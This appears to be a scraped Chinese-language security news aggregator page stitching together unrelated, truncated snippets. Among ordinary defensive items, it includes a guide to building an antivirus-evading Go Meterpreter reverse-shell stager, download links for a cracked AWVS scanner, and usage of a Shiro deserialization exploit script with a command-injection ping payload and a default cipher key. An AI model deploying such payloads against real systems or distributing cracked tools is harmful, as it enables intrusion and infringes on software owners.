Aggregator

总结一下遇到挖矿时应该如何做应急响应与溯源分析。

原文https://l3yx.github.io/2020/02/22/JDK7u21%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96Gadgets/#more 一开始是学习FastJson反序列化的POC，然后发现欠缺不少知识，遂来补一下，收获良多，总结下笔记 所谓JDK反

https://l3yx.github.io/

Golang实现的x86下的Meterpreter reverse tcp。地址：https://github.com/insightglacier/go_meterpreter

做静态免杀实验，代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。

使用方法

修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。

set GOARCH=386 go build -ldflags="-H windowsgui -w"

注意上面参数中没有-s，因为实际测试，使用这种方式build后的程序免杀效果会好一些。如果直接go build，程序会有窗口，同时大小也在1.6M左右。

由于加入了这部分代码，运行后因为执行多次无用代码，需要等一会才可以看到上线。另外目前会出现连接两次msf的情况，但是只有一个连接会返回shell，目前没找到原因。

免杀效果

加入了Bypass AV的代码。

我在刚写好的时候上传到VT，查杀结果位8/62。VT上有超过70个引擎，62个应该是加入BypassAV代码起的作用。

今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀，刚写的时候效果好，但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。

VT检测结果地址：https://www.virustotal.com/gui/file/f8ff4acac418e6cdc326d0139ba2bdb9fce32558985962cf8303fcc97b9e47fb/detection

在使用这个的过程中，Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。

前记：几天看到Dell出售RSA的新闻，与去年赛门被博通收购时不同，这个新闻在笔者心理没有起太多波澜，4年前

今天看到有群里分享Acunetix Web Vulnerability Scanner(AWVS)13的破解版本，这里分享一下～

Windows下载地址：
https://pan.baidu.com/s/10y_nGpe-rLHqRoyB4Hz3BQ

Linux 下载地址：
https://mega.nz/#!JAxkRQgB!RcaAd5-zHKTNQHD28YcAocKB4RVoNDrOZRnL5bCLj0g

官网介绍地址
https://www.acunetix.com/vulnerability-scanner/

注：工具来源于网络，请自行验证是否存在后门等情况，为了安全考虑建议使用虚拟机运行。

细说Tomcat AJP协议文件包含漏洞原理

How the world responds to Coronavirus can teach cyber-defenders a lot about risk communication, incident response, and how controls work… or don’t.

创新沙盒比赛十强名单公布后，各家报道都纷纷加以分析，指出从榜单构成数目来看，应用安全和SaaS安全占据绝大多数。虽然赛事组织者不满固步自封，努力创新求变，套路明显发生改变也是正常的，但市场趋势真的是应用安全要占据半壁江山吗？

Financial services are a well-known target of attack, based on a range of motivations. F5 Labs' Preston Hogue writes for SecurityWeek, discussing financial institutions' unique security environment , and how the need to understand the entire organism is critical.

Guardicore?s Threat Intelligence Firewall blocks connections to malicious IPs, limiting security attack surface before reaching critical assets.

Earlier this year, Akamai's Enterprise team tackled the problem of DGA detection in the wild by using Neural Networks, essentially creating a state-of-the-art solution for near online detection of DGA communication....

一个非常值得一刷的靶场

汇聚共克时艰的网安力量，助力打赢疫情防控阻击战

本文将分享一个RocketMQ的漏洞从发现到自动化利用的实践过程，最后也将安利一个开源的神器Arthas(阿尔萨斯)。本文技术含金量不高，但也希望读者能从中有所收获。

自从聊天软件消息撤回功能问世后，对于撤回的消息，我们对它一直有种强烈的好奇感。“Ta刚撤回了什么？是骂我的话？还是说喜欢我？还是把发给其他人的消息误发给了我？好气呀，都看不到了...”这是我们看到消息被撤回后的内心独白。但是今天，看完了本篇文章你就可以说： 我们看一下效果图，撤回的消息被我们看到了，

Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。

工具下载地址：Shiro_Exploit

该脚本通过网络收集到的22个key，利用ysoserial工具中的URLDNS这个Gadget，并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数，增强灵活性。

环境

Python2.7

requests

Jdk 1.8

使用说明 usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY] OPTIONS: -h, --help show this help message and exit -u URL, --url URL Target url. -t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3 -g GADGET, --gadget GADGET gadget -p PARAMS, --params PARAMS gadget params -k KEY, --key KEY CipherKey Example: python shiro_exploit.py -u target

检测默认只需要使用-u参数即可。

检测可用gadget的方式可以运行

python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="

程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。

Using a few free web sources and a spreadsheet, security teams can use machine learning to quickly predict which critical vulnerabilities will be exploited.

概念 inline hook是一种通过修改机器码的方式来实现hook的技术。 原理 对于正常执行的程序，它的函数调用流程大概是这样的： 0x1000地址的call指令执行后跳转到0x3000地址处执行，执行完毕后再返回执行call指令的下一条指令。 我们在hook的时候，可能会读取或者修改call指